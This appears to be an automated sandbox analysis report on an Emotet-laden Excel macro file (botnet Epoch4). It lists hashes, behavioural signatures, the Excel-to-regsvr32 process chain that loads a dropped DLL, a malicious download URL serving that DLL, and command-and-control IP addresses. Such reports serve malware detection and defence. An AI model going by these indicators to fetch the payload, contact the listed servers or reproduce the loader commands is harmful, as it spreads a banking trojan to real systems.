Analysis

  • max time kernel
    147s
  • max time network
    161s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    12/05/2022, 16:28 UTC

General

  • Target

    ?i=1izkympco.xlsm

  • Size

    50KB

  • MD5

    793c5a832ea9b3c4a225bc96b4449bc2

  • SHA1

    168afc78144b659b18b606a26c3e9a6343dd104a

  • SHA256

    894658b992050ab6d7ee061f083a48264ce56c1b4fbc5ac87c142765405a47f7

  • SHA512

    df041addb6c8113b2add5439f8ce258016233a47a13a3d540187872e4ac25fe3ac87b016bb391a703e0cb73189f1720c0e723b6df47ef971238312ed77a9b607

Malware Config

Extracted

Family

emotet

Botnet

Epoch4

C2


eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\_i=1izkympco.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe -s ..\rulm.dll
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\SysWOW64\regsvr32.exe
        C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcdbwthdrbgozm\vdupunehiaz.gxz"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1568

Network

  • flag-us
    DNS
    harleyqueretaro.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    harleyqueretaro.com
    IN A
    Response
    harleyqueretaro.com
    IN A
    63.247.138.144
  • flag-us
    GET
    http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/
    EXCEL.EXE
    Remote address:
    63.247.138.144:80
    Request
    GET /renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: harleyqueretaro.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 12 May 2022 16:35:56 GMT
    Server: Apache
    X-Powered-By: PHP/5.6.40
    Set-Cookie: 627d376c429cb=1652373356; expires=Thu, 12-May-2022 16:36:56 GMT; Max-Age=60; path=/
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Last-Modified: Thu, 12 May 2022 16:35:56 GMT
    Expires: Thu, 12 May 2022 16:35:56 GMT
    Content-Disposition: attachment; filename="illkVUA0aCB42y28qRyvY91Mq6.dll"
    Content-Transfer-Encoding: binary
    Content-Length: 868352
    Connection: close
    Content-Type: application/x-msdownload
  • 63.247.138.144:80
    http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/
    http
    EXCEL.EXE
    18.8kB
    895.9kB
    388
    649

    HTTP Request

    GET http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

    HTTP Response

    200
  • 68.183.94.239:80
    regsvr32.exe
    152 B
    120 B
    3
    3
  • 104.131.11.205:443
    regsvr32.exe
    152 B
    3
  • 138.197.109.175:8080
    regsvr32.exe
    152 B
    3
  • 187.84.80.182:443
    regsvr32.exe
    104 B
    2
  • 8.8.8.8:53
    harleyqueretaro.com
    dns
    EXCEL.EXE
    65 B
    81 B
    1
    1

    DNS Request

    harleyqueretaro.com

    DNS Response

    63.247.138.144

Downloads

  • C:\Users\Admin\rulm.dll

    Filesize

    848KB

    MD5

    26bf9a27e1ae4680db6c0528579aa5d5

    SHA1

    1c606018e5dc1bd2189b88216ea82c59f72449e9

    SHA256

    7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

    SHA512

    d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

  • \Users\Admin\rulm.dll

    Filesize

    848KB

    MD5

    26bf9a27e1ae4680db6c0528579aa5d5

    SHA1

    1c606018e5dc1bd2189b88216ea82c59f72449e9

    SHA256

    7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

    SHA512

    d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

  • memory/1568-68-0x0000000000290000-0x00000000002B4000-memory.dmp

    Filesize

    144KB

  • memory/1668-54-0x000000002FBE1000-0x000000002FBE4000-memory.dmp

    Filesize

    12KB

  • memory/1668-55-0x0000000071391000-0x0000000071393000-memory.dmp

    Filesize

    8KB

  • memory/1668-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1668-57-0x00000000764C1000-0x00000000764C3000-memory.dmp

    Filesize

    8KB

  • memory/1668-58-0x000000007237D000-0x0000000072388000-memory.dmp

    Filesize

    44KB

  • memory/1804-63-0x0000000000280000-0x00000000002A4000-memory.dmp

    Filesize

    144KB
